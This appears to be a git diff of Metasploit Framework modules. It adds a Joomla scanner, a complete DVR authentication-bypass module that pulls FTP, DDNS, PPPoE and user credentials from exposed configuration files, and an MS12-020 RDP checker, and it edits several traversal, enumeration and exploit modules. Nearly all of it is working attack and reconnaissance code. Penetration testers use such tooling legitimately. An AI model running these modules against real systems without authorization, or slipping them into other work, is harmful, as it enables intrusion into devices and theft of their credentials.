vprint_status("#{peer} - Checking for interesting plugins")
res = send_request_cgi({
'uri' => tpath,
'method' => 'GET'
})
return if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
File.open(datastore['PLUGINS'], 'rb').each_line do |line|
papp = line.chomp
plugin_search(tpath, papp, ip, res.body.size)
end
end
def plugin_search(tpath, papp, ip, osize)
res = send_request_cgi({
'uri' => "#{tpath}#{papp}",
'method' => 'GET'
})
return if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
nsize = res.body.size
if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
print_good("#{peer} - Plugin: #{tpath}#{papp} ")
report_note(
:host => ip,
:port => rport,
:proto => 'http',
:ntype => 'joomla_plugin',
:data => "#{tpath}#{papp}",
:update => :unique_data
)
if (papp =~/passwd/ and res.body =~/root/)
print_good("#{peer} - Vulnerability: Potential LFI")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the 'root' signature",
:risk => 1,
:confidence => 10,
:category => 'Local File Inclusion',
:description => "Joomla: Potential LFI at #{tpath}#{papp}",
:name => 'Local File Inclusion'
)
elsif (res.body =~/SQL syntax/)
print_good("#{peer} - Vulnerability: Potential SQL Injection")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the 'SQL syntax' signature",
:risk => 1,
:confidence => 10,
:category => 'SQL Injection',
:description => "Joomla: Potential SQLI at #{tpath}#{papp}",
:name => 'SQL Injection'
)
elsif (papp =~/>alert/ and res.body =~/>alert/)
print_good("#{peer} - Vulnerability: Potential XSS")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the '>alert' signature",
:risk => 1,
:confidence => 10,
:category => 'Cross Site Scripting',
:description => "Joomla: Potential XSS at #{tpath}#{papp}",
:name => 'Cross Site Scripting'
)
elsif (papp =~/com_/)
vars = papp.split('_')
pages = vars[1].gsub('/','')
res1 = send_request_cgi({
'uri' => "#{tpath}index.php?option=com_#{pages}",
'method' => 'GET'
})
if (res1.code == 200)
print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_page',
:data => "Page: #{tpath}index.php?option=com_#{pages}",
:update => :unique_data
)
else
vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response")
end
end
elsif (res.code == 403)
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} ip access to #{ip} (SSL Required)")
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif (res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
end
end
return
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return
end
end

174
modules/auxiliary/scanner/http/joomla_version.rb Normal file
View File

@ -0,0 +1,174 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Version Scanner',
'Description' => %q{
This module scans a Joomla install for information about the underlying
operating system and Joomla version.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def os_fingerprint(response)
if not response.headers.has_key?('Server')
return "Unkown OS (No Server Header)"
end
case response.headers['Server']
when /Win32/, /\(Windows/, /IIS/
os = "Windows"
when /Apache\//
os = "*Nix"
else
os = "Unknown Server Header Reporting: "+response.headers['Server']
end
return os
end
def fingerprint(response)
case response.body
when /<version.*\/?>(.+)<\/version\/?>/i
v = $1
out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/,
/MooTools\.More\=\{version\:\"1\.3\.0\.1\"/,
/en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/,
/en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/,
/20196 2011\-01\-09 02\:40\:25Z ian/
out = "1.6"
when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /,
/MooTools\.More\=\{version\:\"1\.3\.2\.1\"/,
/22183 2011\-09\-30 09\:04\:32Z infograf768/,
/21660 2011\-06\-23 13\:25\:32Z infograf768/
out = "1.7"
when /Joomla! 1.5/,
/MooTools\=\{version\:\'1\.12\'\}/,
/11391 2009\-01\-04 13\:35\:50Z ian/
out = "1.5"
when /Copyright \(C\) 2005 \- 2012 Open Source Matters/,
/MooTools.More\=\{version\:\"1\.4\.0\.1\"/
out = "2.5"
when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/
out = $1.split(/,/)[0]
when /(Copyright \(C\) 2005 - 200(6|7))/,
/47 2005\-09\-15 02\:55\:27Z rhuk/,
/423 2005\-10\-09 18\:23\:50Z stingrey/,
/1005 2005\-11\-13 17\:33\:59Z stingrey/,
/1570 2005\-12\-29 05\:53\:33Z eddieajau/,
/2368 2006\-02\-14 17\:40\:02Z stingrey/,
/4085 2006\-06\-21 16\:03\:54Z stingrey/,
/4756 2006\-08\-25 16\:07\:11Z stingrey/,
/5973 2006\-12\-11 01\:26\:33Z robs/,
/5975 2006\-12\-11 01\:26\:33Z robs/
out = "1.0"
else
out = 'Unknown Joomla'
end
return out
end
def check_file(tpath, file, ip)
res = send_request_cgi({
'uri' => "#{tpath}#{file}",
'method' => 'GET'
})
return :abort if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code == 200)
os = os_fingerprint(res)
out = fingerprint(res)
return false if not out
if(out =~ /Unknown Joomla/)
print_error("#{peer} - Unable to identify Joomla Version with #{file}")
return false
else
print_good("#{peer} - Joomla Version:#{out} from: #{file} ")
print_good("#{peer} - OS: #{os}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_version',
:data => out
)
return true
end
elsif (res.code == 403)
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif(res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
end
return :abort
end
return false
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return :abort
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return :abort
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return :abort
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
files = [
'language/en-GB/en-GB.xml',
'templates/system/css/system.css',
'media/system/js/mootools-more.js',
'language/en-GB/en-GB.ini',
'htaccess.txt',
'language/en-GB/en-GB.com_media.ini'
]
vprint_status("#{peer} - Checking Joomla version")
files.each do |file|
joomla_found = check_file(tpath, file, ip)
return if joomla_found == :abort
break if joomla_found
end
end
end

30
modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb
View File

@ -19,7 +19,10 @@ class Metasploit3 < Msf::Auxiliary
This module attempts to identify Ruby on Rails instances vulnerable to
an arbitrary object instantiation flaw in the XML request processor.
},
'Author' => 'hdm',
'Author' => [
'hdm', #author
'jjarmoc' #improvements
],
'License' => MSF_LICENSE,
'References' =>
[
@ -29,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary
))
register_options([
OptString.new('URIPATH', [true, "The URI to test", "/"])
OptString.new('URIPATH', [true, "The URI to test", "/"]),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]),
], self.class)
end
@ -37,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
odata = %Q^<?xml version="1.0" encoding="UTF-8"?>\n<probe type="#{ptype}"><![CDATA[\n#{pdata}\n]]></probe>^
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => 'POST',
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'data' => odata
}, 25)
@ -46,29 +50,35 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
res1 = send_probe("string", "hello")
res2 = send_probe("yaml", "--- !ruby/object:Time {}\n")
res3 = send_probe("yaml", "--- !ruby/object:\x00")
unless res1
vprint_status("#{rhost}:#{rport} No reply to the initial XML request")
return
end
if res1.code.to_s =~ /^[5]/
vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH")
return
end
res2 = send_probe("yaml", "--- !ruby/object:Time {}\n")
unless res2
vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe")
return
end
res3 = send_probe("yaml", "--- !ruby/object:\x00")
unless res3
vprint_status("#{rhost}:#{rport} No reply to the second YAML probe")
return
end
if res1.code.to_s =~ /^[45]/
vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH")
end
vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}")
if res2.code.to_s =~ /^[23]/ and res3.code != res2.code and res3.code != 200
if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)
print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML")
report_vuln({
:host => rhost,
@ -79,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
:refs => self.references
})
else
vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set")
vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set")
end
end

5
modules/auxiliary/scanner/http/s40_traversal.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH']
@ -52,9 +52,10 @@ class Metasploit3 < Msf::Auxiliary
print_status("Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php')
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}index.php/?p=#{t}#{datastore['FILE']}%00"
'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00"
})
if not res

2
modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
View File

@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
begin
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + "/services/Session",
'uri' => normalize_uri(datastore['URI'], "/services/Session"),
'method' => 'POST',
'data' => data,
'headers' =>

2
modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']) + "/services/listServices",
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
'method' => 'GET'
}, 25)
return if not res

2
modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb
View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']) + "/services/listServices",
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
'method' => 'GET'
}, 25)
return if not res or res.code != 200

4
modules/auxiliary/scanner/http/vcms_login.rb
View File

@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user
when /Invalid password/
vprint_status("#{@peer} - Username found: #{user}")
else /\<a href="process.php\?logout=1"\>/
else /\<a href="process\.php\?logout=1"\>/
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@uri = normalize_uri(target_uri)
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"

4
modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(9084),
OptString.new('URIPATH', [true, 'URI path to the downloads/', '/vci/downloads/']),
OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini'])
], self.class)
end
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
fname = File.basename(datastore['FILE'])
traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE']
uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
print_status("#{rhost}:#{rport} - Requesting: #{uri}")

222
modules/auxiliary/scanner/misc/dvr_config_disclosure.rb Normal file
View File

@ -0,0 +1,222 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',
'Description' => %q{
This module takes advantage of an authentication bypass vulnerability at the
web interface of multiple manufacturers DVR systems, which allows to retrieve the
device configuration.
},
'Author' =>
[
'Alejandro Ramos', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1391' ],
[ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]
],
'License' => MSF_LICENSE
)
end
def get_pppoe_credentials(conf)
user = ""
password = ""
enabled = ""
if conf =~ /PPPOE_EN=(\d)/
enabled = $1
end
return if enabled == "0"
if conf =~ /PPPOE_USER=(.*)/
user = $1
end
if conf =~ /PPPOE_PASSWORD=(.*)/
password = $1
end
if user.empty? or password.empty?
return
end
info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}"
report_note({
:host => rhost,
:data => info,
:type => "dvr.pppoe.conf",
:sname => 'pppoe',
:update => :unique_data
})
end
def get_ddns_credentials(conf)
hostname = ""
user = ""
password = ""
enabled = ""
if conf =~ /DDNS_EN=(\d)/
enabled = $1
end
return if enabled == "0"
if conf =~ /DDNS_HOSTNAME=(.*)/
hostname = $1
end
if conf =~ /DDNS_USER=(.*)/
user = $1
end
if conf =~ /DDNS_PASSWORD=(.*)/
password = $1
end
if hostname.empty?
return
end
info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}"
report_note({
:host => rhost,
:data => info,
:type => "dvr.ddns.conf",
:sname => 'ddns',
:update => :unique_data
})
end
def get_ftp_credentials(conf)
server = ""
user = ""
password = ""
port = ""
if conf =~ /FTP_SERVER=(.*)/
server = $1
end
if conf =~ /FTP_USER=(.*)/
user = $1
end
if conf =~ /FTP_PASSWORD=(.*)/
password = $1
end
if conf =~ /FTP_PORT=(.*)/
port = $1
end
if server.empty?
return
end
report_auth_info({
:host => server,
:port => port,
:sname => 'ftp',
:duplicate_ok => false,
:user => user,
:pass => password
})
end
def get_dvr_credentials(conf)
conf.scan(/USER(\d+)_USERNAME/).each { |match|
user = ""
password = ""
active = ""
user_id = match[0]
if conf =~ /USER#{user_id}_LOGIN=(.*)/
active = $1
end
if conf =~ /USER#{user_id}_USERNAME=(.*)/
user = $1
end
if conf =~ /USER#{user_id}_PASSWORD=(.*)/
password = $1
end
if active == "0"
user_active = false
else
user_active = true
end
report_auth_info({
:host => rhost,
:port => rport,
:sname => 'dvr',
:duplicate_ok => false,
:user => user,
:pass => password,
:active => user_active
})
}
end
def run_host(ip)
res = send_request_cgi({
'uri' => '/DVR.cfg',
'method' => 'GET'
})
if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/
vprint_error("#{rhost}:#{rport} - DVR configuration not found")
return
end
p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg")
vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}")
conf = res.body
get_ftp_credentials(conf)
get_dvr_credentials(conf)
get_ddns_credentials(conf)
get_pppoe_credentials(conf)
dvr_name = ""
if res.body =~ /DVR_NAME=(.*)/
dvr_name = $1
end
report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")
print_good("#{rhost}:#{rport} DVR #{dvr_name} found")
end
end

1
modules/auxiliary/scanner/mysql/mysql_login.rb
View File

@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
end
offset = 0
l0, l1, l2 = data[offset, 3].unpack('CCC')
return false if data.length < 3
length = l0 | (l1 << 8) | (l2 << 16)
# Read a bad amount of data
return if length != (data.length - 4)

178
modules/auxiliary/scanner/rdp/ms12_020_check.rb Normal file
View File

@ -0,0 +1,178 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS12-020 Microsoft Remote Desktop Checker',
'Description' => %q{
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.
},
'References' =>
[
[ 'CVE', '2012-0002' ],
[ 'MSB', 'MS12-020' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ],
[ 'EDB', '18606' ],
[ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ]
],
'Author' =>
[
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
],
'License' => MSF_LICENSE
))
register_options(
[
OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])
], self.class)
end
def check_rdp
# code to check if RDP is open or not
vprint_status("#{peer} Verifying RDP protocol...")
# send connection
sock.put(connection_request)
# read packet to see if its rdp
res = sock.get_once(-1, 5)
# return true if this matches our vulnerable response
( res and res == "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" )
end
def report_goods
report_vuln(
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => self.name,
:info => 'Response indicates a missing patch',
:refs => self.references
)
end
def connection_request
"\x03\x00" + # TPKT Header version 03, reserved 0
"\x00\x0b" + # Length
"\x06" + # X.224 Data TPDU length
"\xe0" + # X.224 Type (Connection request)
"\x00\x00" + # dst reference
"\x00\x00" + # src reference
"\x00" # class and options
end
def connect_initial
"\x03\x00\x00\x65" + # TPKT Header
"\x02\xf0\x80" + # Data TPDU, EOT
"\x7f\x65\x5b" + # Connect-Initial
"\x04\x01\x01" + # callingDomainSelector
"\x04\x01\x01" + # callingDomainSelector
"\x01\x01\xff" + # upwardFlag
"\x30\x19" + # targetParams + size
"\x02\x01\x22" + # maxChannelIds
"\x02\x01\x20" + # maxUserIds
"\x02\x01\x00" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x02\xff\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x30\x18" + # minParams + size
"\x02\x01\x01" + # maxChannelIds
"\x02\x01\x01" + # maxUserIds
"\x02\x01\x01" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x01\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x30\x19" + # maxParams + size
"\x02\x01\xff" + # maxChannelIds
"\x02\x01\xff" + # maxUserIds
"\x02\x01\xff" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x02\xff\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x04\x00" # userData
end
def user_request
"\x03\x00" + # header
"\x00\x08" + # length
"\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission)
"\x28" # PER encoded PDU contents
end
def channel_request_one
"\x03\x00\x00\x0c" +
"\x02\xf0\x80\x38" +
"\x00\x01\x03\xeb"
end
def channel_request_two
"\x03\x00\x00\x0c" +
"\x02\xf0\x80\x38" +
"\x00\x02\x03\xeb"
end
def peer
"#{rhost}:#{rport}"
end
def run_host(ip)
connect
# check if rdp is open
if not check_rdp
disconnect
return
end
# send connectInitial
sock.put(connect_initial)
# send userRequest
sock.put(user_request)
res = sock.get_once(-1, 5)
# send 2nd userRequest
sock.put(user_request)
res = sock.get_once(-1, 5)
# send channel request one
sock.put(channel_request_one)
res = sock.get_once(-1, 5)
if res and res[8,2] == "\x3e\x00"
# send ChannelRequestTwo - prevent BSoD
sock.put(channel_request_two)
print_good("#{peer} Vulnerable to MS12-020")
report_goods
else
vprint_status("#{peer} Not Vulnerable")
end
disconnect()
end
end

19
modules/auxiliary/scanner/smb/smb_lookupsid.rb
View File

@ -24,12 +24,21 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Local User Enumeration (LookupSid)',
'Description' => 'Determine what local users exist via brute force SID lookups',
'Description' => 'Determine what users exist via brute force SID lookups.
This module can enumerate both local and domain accounts by setting
ACTION to either LOCAL or DOMAIN',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'DefaultOptions' =>
{
'DCERPC::fake_bind_multi' => false
}
},
'Actions' =>
[
['LOCAL', { 'Description' => 'Enumerate local accounts' } ],
['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ]
],
'DefaultAction' => 'LOCAL'
)
register_options(
@ -206,6 +215,8 @@ class Metasploit3 < Msf::Auxiliary
:groups => {}
}
target_sid = host_sid if action.name =~ /LOCAL/i
target_sid = domain_sid if action.name =~ /DOMAIN/i
# Brute force through a common RID range
500.upto(datastore['MaxRID'].to_i) do |rid|
@ -216,7 +227,7 @@ class Metasploit3 < Msf::Auxiliary
NDR.long(1) +
NDR.long(rand(0x10000000)) +
NDR.long(5) +
smb_pack_sid(host_sid) +
smb_pack_sid(target_sid) +
NDR.long(rid) +
NDR.long(0) +
NDR.long(0) +

65
modules/auxiliary/scanner/upnp/ssdp_msearch.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'UPnP SSDP M-SEARCH Information Discovery',
'Description' => 'Discover information from UPnP-enabled systems',
'Author' => 'todb',
'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively
'License' => MSF_LICENSE
)
@ -26,6 +26,10 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
def rport
datastore['RPORT']
end
def setup
super
@msearch_probe =
@ -34,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n" +
"\r\n\r\n" # Non-standard, but helps
"\r\n"
end
def scanner_prescan(batch)
@ -43,10 +47,13 @@ class Metasploit3 < Msf::Auxiliary
end
def scan_host(ip)
vprint_status "#{ip}:#{rport} - SSDP - sending M-SEARCH probe"
scanner_send(@msearch_probe, ip, datastore['RPORT'])
end
def scanner_postscan(batch)
print_status "No SSDP endpoints found." if @results.empty?
@results.each_pair do |skey,res|
sinfo = res[:service]
next unless sinfo
@ -60,9 +67,57 @@ class Metasploit3 < Msf::Auxiliary
desc = bits.join(" | ")
sinfo[:info] = desc
res[:vulns] = []
if res[:info][:server].to_s =~ /MiniUPnPd\/1\.0([\.\,\-\~\s]|$)/mi
res[:vulns] << {
:name => "MiniUPnPd ProcessSSDPRequest() Out of Bounds Memory Access Denial of Service",
:refs => [ 'CVE-2013-0229' ]
}
end
if res[:info][:server].to_s =~ /MiniUPnPd\/1\.[0-3]([\.\,\-\~\s]|$)/mi
res[:vulns] << {
:name => "MiniUPnPd ExecuteSoapAction memcpy() Remote Code Execution",
:refs => [ 'CVE-2013-0230' ],
:port => res[:info][:ssdp_port] || 80,
:proto => 'tcp'
}
end
if res[:info][:server].to_s =~ /Intel SDK for UPnP devices.*|Portable SDK for UPnP devices(\/?\s*$|\/1\.([0-5]\..*|8\.0.*|(6\.[0-9]|6\.1[0-7])([\.\,\-\~\s]|$)))/mi
res[:vulns] << {
:name => "Portable SDK for UPnP Devices unique_service_name() Remote Code Execution",
:refs => [ 'CVE-2012-5958', 'CVE-2012-5959' ]
}
end
if res[:vulns].length > 0
vrefs = []
res[:vulns].each do |v|
v[:refs].each do |r|
vrefs << r
end
end
print_good("#{skey} SSDP #{desc} | vulns:#{res[:vulns].count} (#{vrefs.join(", ")})")
else
print_status("#{skey} SSDP #{desc}")
end
report_service( sinfo )
res[:vulns].each do |v|
report_vuln(
:host => sinfo[:host],
:port => v[:port] || sinfo[:port],
:proto => v[:proto] || 'udp',
:name => v[:name],
:info => res[:info][:server],
:refs => v[:refs]
)
end
if res[:info][:ssdp_host]
report_service(
:host => res[:info][:ssdp_host],
@ -89,14 +144,14 @@ class Metasploit3 < Msf::Auxiliary
}
}
if data =~ /^Server:[\s]*(.*)/i
if data =~ /^Server:[\s]*(.*)/mi
@results[skey][:info][:server] = $1.strip
end
ssdp_host = nil
ssdp_port = 80
location_string = ''
if data =~ /^Location:[\s]*(.*)/i
if data =~ /^Location:[\s]*(.*)/mi
location_string = $1
@results[skey][:info][:location] = $1.strip
if location_string[/(https?):\x2f\x2f([^\x5c\x2f]+)/]
@ -113,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
if data =~ /^USN:[\s]*(.*)/i
if data =~ /^USN:[\s]*(.*)/mi
@results[skey][:info][:usn] = $1.strip
end

5
modules/exploits/linux/http/dolibarr_cmd_exec.rb
View File

@ -61,6 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_raw({
'method' => 'GET',
'uri' => uri
@ -114,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@uri = normalize_uri(target_uri)
@uri = target_uri
@uri.path << "/" if @uri.path[-1, 1] != "/"
peer = "#{rhost}:#{rport}"
@ -140,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending malicious request...")
res = send_request_cgi({
'method' => 'POST',
'uri' => @uri.path + "admin/tools/export.php",
'uri' => normalize_uri(@uri.path, "admin/tools/export.php"),
'cookie' => sid,
'vars_post' => {
'token' => token,

4
modules/exploits/linux/http/symantec_web_gateway_exec.rb
View File

@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending Command injection")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}spywall/ipchange.php",
'uri' => normalize_uri(uri, 'spywall/ipchange.php'),
'data' => post_data
})

4
modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}spywall/blocked_file.php",
'uri' => normalize_uri(uri, "spywall/blocked_file.php"),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})

5
modules/exploits/linux/http/vcms_upload.rb
View File

@ -63,6 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_raw({
'uri' => uri,
'method' => 'GET'
@ -78,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
base = normalize_uri(target_uri.path)
base = target_uri.path
base << '/' if base[-1,1] != '/'
@payload_name = "#{rand_text_alpha(5)}.php"
